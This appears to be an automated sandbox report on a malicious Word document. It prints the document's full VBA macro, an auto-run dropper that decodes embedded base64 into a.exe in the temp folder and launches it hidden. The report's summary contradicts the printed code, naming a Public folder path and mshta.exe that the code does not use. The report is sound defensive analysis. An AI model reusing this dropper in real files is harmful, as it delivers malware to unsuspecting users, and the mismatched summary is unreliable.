MALICIOUS
278
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
T1053.005 Scheduled Task/Job
T1071.001 Web Protocols
The sample contains VBA macros, including an autoopen subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to decode embedded data, save it as an executable file in the user's temporary directory (e.g., C:\Users\Public\a.exe), and then execute it using mshta.exe. This indicates a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell filename, vbHide End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() Dim handle As Long -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
filename = Environ("tmp") & "\a.exe" handle = FreeFile -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly00000F33 41 inc ecx 00000F34 41 inc ecx 00000F35 41 inc ecx 00000F36 41 inc ecx 00000F37 41 inc ecx 00000F38 41 inc ecx 00000F39 41 inc ecx 00000F3A 41 inc ecx 00000F3B 41 inc ecx 00000F3C 41 inc ecx 00000F3D 41 inc ecx 00000F3E 41 inc ecx 00000F3F 41 inc ecx 00000F40 41 inc ecx 00000F41 41 inc ecx 00000F42 41 inc ecx 00000F43 41 inc ecx 00000F44 41 inc ecx 00000F45 41 inc ecx 00000F46 41 inc ecx 00000F47 41 inc ecx 00000F48 41 inc ecx 00000F49 41 inc ecx 00000F4A 41 inc ecx 00000F4B 41 inc ecx 00000F4C 41 inc ecx 00000F4D 41 inc ecx 00000F4E 41 inc ecx 00000F4F 41 inc ecx 00000F50 41 inc ecx 00000F51 41 inc ecx 00000F52 41 inc ecx 00000F53 41 inc ecx 00000F54 41 inc ecx 00000F55 41 inc ecx 00000F56 41 inc ecx 00000F57 41 inc ecx 00000F58 41 inc ecx 00000F59 41 inc ecx 00000F5A 41 inc ecx 00000F5B 41 inc ecx 00000F5C 41 inc ecx 00000F5D 41 inc ecx 00000F5E 41 inc ecx 00000F5F 41 inc ecx 00000F60 41 inc ecx 00000F61 41 inc ecx 00000F62 41 inc ecx 00000F63 41 inc ecx 00000F64 41 inc ecx 00000F65 41 inc ecx 00000F66 41 inc ecx 00000F67 41 inc ecx 00000F68 41 inc ecx 00000F69 41 inc ecx 00000F6A 41 inc ecx 00000F6B 41 inc ecx 00000F6C 41 inc ecx 00000F6D 41 inc ecx 00000F6E 41 inc ecx 00000F6F 41 inc ecx 00000F70 41 inc ecx 00000F71 41 inc ecx 00000F72 41 inc ecx 00000F73 41 inc ecx 00000F74 41 inc ecx 00000F75 41 inc ecx 00000F76 41 inc ecx 00000F77 41 inc ecx 00000F78 41 inc ecx 00000F79 41 inc ecx 00000F7A 41 inc ecx 00000F7B 41 inc ecx 00000F7C 41 inc ecx 00000F7D 41 inc ecx 00000F7E 41 inc ecx 00000F7F 41 inc ecx 00000F80 41 inc ecx 00000F81 41 inc ecx 00000F82 41 inc ecx 00000F83 41 inc ecx 00000F84 41 inc ecx 00000F85 41 inc ecx 00000F86 41 inc ecx 00000F87 41 inc ecx 00000F88 41 inc ecx 00000F89 41 inc ecx 00000F8A 41 inc ecx 00000F8B 41 inc ecx 00000F8C 41 inc ecx 00000F8D 41 inc ecx 00000F8E 41 inc ecx 00000F8F 41 inc ecx 00000F90 41 inc ecx 00000F91 41 inc ecx 00000F92 41 inc ecx
-
Reference to mshta.exe high SC_STR_MSHTAReference to mshta.exe
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13123 bytes |
SHA-256: 19361d433310cd3b4415a42fb6a42af277bf45a7c6b7cda9f987fa2be5aa1eb8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Map1(0 To 63) As Byte
Private Map2(0 To 127) As Byte
Sub autoopen()
Dim handle As Long
Dim filename As String
Dim data() As Byte
Dim text As String
Init
filename = Environ("tmp") & "\a.exe"
handle = FreeFile
text = GetEmbedded()
data = Base64Decode(Mid(text, 2, Len(text) - 2))
Open filename For Binary Access Write As #handle
Put #handle, 1, data
Close #handle
Shell filename, vbHide
End Sub
Private Sub Init()
Dim c As Integer, i As Integer
' set Map1
i = 0
For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
Map1(i) = Asc("+"): i = i + 1
Map1(i) = Asc("/"): i = i + 1
' set Map2
For i = 0 To 127: Map2(i) = 255: Next
For i = 0 To 63: Map2(Map1(i)) = i: Next
End Sub
Private Function ConvertStringToBytes(ByVal s As String) As Byte()
Dim b1() As Byte: b1 = s
Dim l As Long: l = (UBound(b1) + 1) \ 2
If l = 0 Then ConvertStringToBytes = b1: Exit Function
Dim b2() As Byte
ReDim b2(0 To l - 1) As Byte
Dim p As Long
For p = 0 To l - 1
Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
If c >= 256 Then c = Asc("?")
b2(p) = c
Next
ConvertStringToBytes = b2
End Function
Public Function Base64Decode(ByVal s As String) As Byte()
Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
Dim v As Byte: v = IBuf(UBound(IBuf))
Dim ILen As Long: ILen = UBound(IBuf) + 1
If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
Do While ILen > 0
If IBuf(ILen - 1) <> Asc("=") Then Exit Do
ILen = ILen - 1
Loop
Dim OLen As Long: OLen = (ILen * 3) \ 4
Dim Out() As Byte
ReDim Out(0 To OLen - 1) As Byte
Dim ip As Long
Dim op As Long
Do While ip < ILen
Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim b0 As Byte: b0 = Map2(i0)
Dim b1 As Byte: b1 = Map2(i1)
Dim b2 As Byte: b2 = Map2(i2)
Dim b3 As Byte: b3 = Map2(i3)
If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
Out(op) = o0: op = op + 1
If op < OLen Then Out(op) = o1: op = op + 1
If op < OLen Then Out(op) = o2: op = op + 1
Loop
Base64Decode = Out
End Function
Private Function GetEmbedded() As String
GetEmbedded = ActiveDocument.Paragraphs(3).Range.text
End Function
' Processing file: /tmp/qstore_2mf7fgql
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 11070 bytes
' Line #0:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x003F
' VarDefn Map1 (As Byte) 0x0017
' Line #1:
' Dim (Private)
' LitDI2 0x0000
' LitDI2 0x007F
' VarDefn Map2 (As Byte)
' Line #2:
' Line #3:
' FuncDefn (Sub autoopen())
' Line #4:
' Dim
' VarDefn handle (As Long)
' Line #5:
' Dim
' VarDefn filename (As String)
' Line #6:
' Dim
' VarDefn data (As Byte)
' Line #7:
' Dim
' VarDefn Text (As String)
' Line #8:
' ArgsCall Init 0x0000
' Line #9:
' Line #10:
' LitStr 0x0003 "tmp"
' ArgsLd Environ 0x0001
' LitStr 0x0006 "\a.exe"
' Concat
' St filename
' Line #11:
' Ld FreeFile
' St handle
' Line #12:
' ArgsLd GetEmbedded 0x0000
' St Text
' Line #13:
' Ld Text
' LitDI2 0x0002
' Ld Text
' FnLen
' LitDI2 0x0002
' Sub
' ArgsLd Mid 0x0003
' ArgsLd Base64Decode 0x0001
' St data
' Line #14:
' Ld filename
' Ld handle
' Sharp
' LitDefault
' Open (For Binary Access Write)
' Line #15:
' Ld handle
' Sharp
' LitDI2 0x0001
' Ld data
' PutRec
' Line #16:
' Ld handle
' Sharp
' Close 0x0001
' Line #17:
' Line #18:
' Ld filename
' Ld vbHide
' ArgsCall Shell 0x0002
' Line #19:
' EndSub
' Line #20:
' Line #21:
' FuncDefn (Private Sub Init())
' Line #22:
' Dim
' VarDefn c (As Integer)
' VarDefn i (As Integer)
' Line #23:
' QuoteRem 0x0003 0x0009 " set Map1"
' Line #24:
' LitDI2 0x0000
' St i
' Line #25:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "Z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #26:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "a"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "z"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #27:
' StartForVariable
' Ld c
' EndForVariable
' LitStr 0x0001 "0"
' ArgsLd Asc 0x0001
' LitStr 0x0001 "9"
' ArgsLd Asc 0x0001
' For
' BoS 0x0000
' Ld c
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' BoS 0x0000
' StartForVariable
' Next
' Line #28:
' LitStr 0x0001 "+"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #29:
' LitStr 0x0001 "/"
' ArgsLd Asc 0x0001
' Ld i
' ArgsSt Map1 0x0001
' BoS 0x0000
' Ld i
' LitDI2 0x0001
' Add
' St i
' Line #30:
' QuoteRem 0x0003 0x0009 " set Map2"
' Line #31:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x007F
' For
' BoS 0x0000
' LitDI2 0x00FF
' Ld i
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #32:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x003F
' For
' BoS 0x0000
' Ld i
' Ld i
' ArgsLd Map1 0x0001
' ArgsSt Map2 0x0001
' BoS 0x0000
' StartForVariable
' Next
' Line #33:
' EndSub
' Line #34:
' Line #35:
' FuncDefn (Private Function ConvertStringToBytes(ByVal s As String, id_FFFE As ) As Append)
' Line #36:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld s
' St b1
' Line #37:
' Dim
' VarDefn l (As Long)
' BoS 0x0000
' Ld b1
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0002
' IDiv
' St l
' Line #38:
' Ld l
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' Ld b1
' St ConvertStringToBytes
' BoS 0x0000
' ExitFunc
' EndIf
' Line #39:
' Dim
' VarDefn b2 (As Byte)
' Line #40:
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' RedimAs b2 0x0001 (As Byte)
' Line #41:
' Dim
' VarDefn p (As Long)
' Line #42:
' StartForVariable
' Ld p
' EndForVariable
' LitDI2 0x0000
' Ld l
' LitDI2 0x0001
' Sub
' For
' Line #43:
' Dim
' VarDefn c (As Long)
' BoS 0x0000
' LitDI2 0x0002
' Ld p
' Mul
' ArgsLd b1 0x0001
' LitDI2 0x0100
' LitDI2 0x0002
' Ld p
' Mul
' LitDI2 0x0001
' Add
' ArgsLd b1 0x0001
' Coerce (Lng)
' Mul
' Add
' St c
' Line #44:
' Ld c
' LitDI2 0x0100
' Ge
' If
' BoSImplicit
' LitStr 0x0001 "?"
' ArgsLd Asc 0x0001
' St c
' EndIf
' Line #45:
' Ld c
' Ld p
' ArgsSt b2 0x0001
' Line #46:
' StartForVariable
' Next
' Line #47:
' Ld b2
' St ConvertStringToBytes
' Line #48:
' EndFunc
' Line #49:
' Line #50:
' FuncDefn (Public Function Base64Decode(ByVal s As String, id_FFFE As ) As Append)
' Line #51:
' Dim
' VarDefn IBuf (As Byte)
' BoS 0x0000
' Ld s
' ArgsLd ConvertStringToBytes 0x0001
' St IBuf
' Line #52:
' Dim
' VarDefn v (As Byte)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' ArgsLd IBuf 0x0001
' St v
' Line #53:
' Dim
' VarDefn ILen (As Long)
' BoS 0x0000
' Ld IBuf
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' St ILen
' Line #54:
' Line #55:
' Ld ILen
' LitDI2 0x0004
' Mod
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x003D "Length of Base64 encoded input string is not a multiple of 4."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #56:
' Ld ILen
' LitDI2 0x0000
' Gt
' DoWhile
' Line #57:
' Ld ILen
' LitDI2 0x0001
' Sub
' ArgsLd IBuf 0x0001
' LitStr 0x0001 "="
' ArgsLd Asc 0x0001
' Ne
' If
' BoSImplicit
' ExitDo
' EndIf
' Line #58:
' Ld ILen
' LitDI2 0x0001
' Sub
' St ILen
' Line #59:
' Loop
' Line #60:
' Dim
' VarDefn OLen (As Long)
' BoS 0x0000
' Ld ILen
' LitDI2 0x0003
' Mul
' Paren
' LitDI2 0x0004
' IDiv
' St OLen
' Line #61:
' Dim
' VarDefn Out (As Byte)
' Line #62:
' LitDI2 0x0000
' Ld OLen
' LitDI2 0x0001
' Sub
' RedimAs Out 0x0001 (As Byte)
' Line #63:
' Dim
' VarDefn ip (As Long)
' Line #64:
' Dim
' VarDefn op (As Long)
' Line #65:
' Ld ip
' Ld ILen
' Lt
' DoWhile
' Line #66:
' Dim
' VarDefn i0 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i0
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #67:
' Dim
' VarDefn i1 (As Byte)
' BoS 0x0000
' Ld ip
' ArgsLd IBuf 0x0001
' St i1
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Line #68:
' Dim
' VarDefn i2 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i2
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i2
' EndIf
' Line #69:
' Dim
' VarDefn i3 (As Byte)
' BoS 0x0000
' Ld ip
' Ld ILen
' Lt
' If
' BoSImplicit
' Ld ip
' ArgsLd IBuf 0x0001
' St i3
' BoS 0x0000
' Ld ip
' LitDI2 0x0001
' Add
' St ip
' Else
' BoSImplicit
' LitStr 0x0001 "A"
' ArgsLd Asc 0x0001
' St i3
' EndIf
' Line #70:
' LineCont 0x0004 11 00 09 00
' Ld i0
' LitDI2 0x007F
' Gt
' Ld i1
' LitDI2 0x007F
' Gt
' Or
' Ld i2
' LitDI2 0x007F
' Gt
' Or
' Ld i3
' LitDI2 0x007F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #71:
' Dim
' VarDefn b0 (As Byte)
' BoS 0x0000
' Ld i0
' ArgsLd Map2 0x0001
' St b0
' Line #72:
' Dim
' VarDefn b1 (As Byte)
' BoS 0x0000
' Ld i1
' ArgsLd Map2 0x0001
' St b1
' Line #73:
' Dim
' VarDefn b2 (As Byte)
' BoS 0x0000
' Ld i2
' ArgsLd Map2 0x0001
' St b2
' Line #74:
' Dim
' VarDefn b3 (As Byte)
' BoS 0x0000
' Ld i3
' ArgsLd Map2 0x0001
' St b3
' Line #75:
' LineCont 0x0004 11 00 09 00
' Ld b0
' LitDI2 0x003F
' Gt
' Ld b1
' LitDI2 0x003F
' Gt
' Or
' Ld b2
' LitDI2 0x003F
' Gt
' Or
' Ld b3
' LitDI2 0x003F
' Gt
' Or
' If
' BoSImplicit
' Ld vbObjectError
' ParamOmitted
' LitStr 0x0029 "Illegal character in Base64 encoded data."
' Ld Err
' ArgsMemCall Raise 0x0003
' EndIf
' Line #76:
' Dim
' VarDefn o0 (As Byte)
' BoS 0x0000
' Ld b0
' LitDI2 0x0004
' Mul
' Paren
' Ld b1
' LitHI2 0x0010
' IDiv
' Paren
' Or
' St o0
' Line #77:
' Dim
' VarDefn o1 (As Byte)
' BoS 0x0000
' Ld b1
' LitHI2 0x000F
' And
' Paren
' LitHI2 0x0010
' Mul
' Paren
' Ld b2
' LitDI2 0x0004
' IDiv
' Paren
' Or
' St o1
' Line #78:
' Dim
' VarDefn o2 (As Byte)
' BoS 0x0000
' Ld b2
' LitDI2 0x0003
' And
' Paren
' LitHI2 0x0040
' Mul
' Paren
' Ld b3
' Or
' St o2
' Line #79:
' Ld o0
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' Line #80:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o1
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #81:
' Ld op
' Ld OLen
' Lt
' If
' BoSImplicit
' Ld o2
' Ld op
' ArgsSt Out 0x0001
' BoS 0x0000
' Ld op
' LitDI2 0x0001
' Add
' St op
' EndIf
' Line #82:
' Loop
' Line #83:
' Ld Out
' St Base64Decode
' Line #84:
' EndFunc
' Line #85:
' Line #86:
' FuncDefn (Private Function GetEmbedded(id_FFFE As String) As String)
' Line #87:
' LitDI2 0x0003
' Ld ActiveDocument
' ArgsMemLd Paragraphs 0x0001
' MemLd Range
' MemLd Text
' St GetEmbedded
' Line #88:
' EndFunc
' Line #89:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.